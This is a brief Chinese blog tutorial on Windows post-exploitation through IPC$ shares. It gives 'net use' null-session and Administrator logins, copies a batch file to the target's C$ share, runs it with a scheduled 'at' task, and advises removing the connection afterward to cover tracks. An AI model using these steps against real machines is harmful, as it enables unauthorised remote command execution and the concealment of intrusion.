【后渗透】利用IPC进行渗透

IPC

什么是IPC?
IPC(Internet Process Connect),直译过来就是网络进程连接,一般用来进行资源共享的。
我们经常会说IPC空连接,就是连接的时候不用账户和密码,但是一般这种情况是没啥权限的,如果我们能有一个管理员的账户,那么就可以有管理员的权限来进行渗透了。

IPC入侵思路

因为渗透的时候是需要灵活的技巧,因此这里只是记录一个渗透思路罢了。

IPC空连接

net use \\ip\ipc$ "" /user:""

以某用户账户登陆

net use \\ip\ipc$ "password" /user:Administrator

之后,我们可以写一个批处理文件,里面包含这我们想执行的命令,然后copy到服务器上

copy 1.bat \\ip\c$

这样,就会把它上传到c盘

之后我们可以利用windows的定时任务来执行这个文件
首先我们看一下服务器上的时间

net time \\ip

之后利用at命令来设置定时任务

at \\ip 时间 文件名

渗透完毕后记得删掉记录

net use \\ip\ipc$ /del
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • Android 自定义View的各种姿势1 Activity的显示之ViewRootImpl详解 Activity...
    passiontim阅读 173,852评论 25 709
  • 关于Mongodb的全面总结 MongoDB的内部构造《MongoDB The Definitive Guide》...
    中v中阅读 32,056评论 2 89
  • 你说你只是缺少个玩伴才和我在一起的,我不想每天都活在你的阴影下,我也不想每天都十分等待你的消息,与其煎熬,不如结...
    奈何沉沦阅读 147评论 0 0
  • 守夜人 夜里的灵魂一直在飘飘荡荡 等不到安稳的一生 随时靠着沉浮歇息 我们是守夜的两个...
    陈汐年阅读 785评论 8 32
  • 看过《修女也疯狂》,平常一本正经的修女们疯起来真的不要命!吃货呢?平时本来就够疯的,再疯起来,那可真是没命了! 能...
    元初阅读 249评论 0 0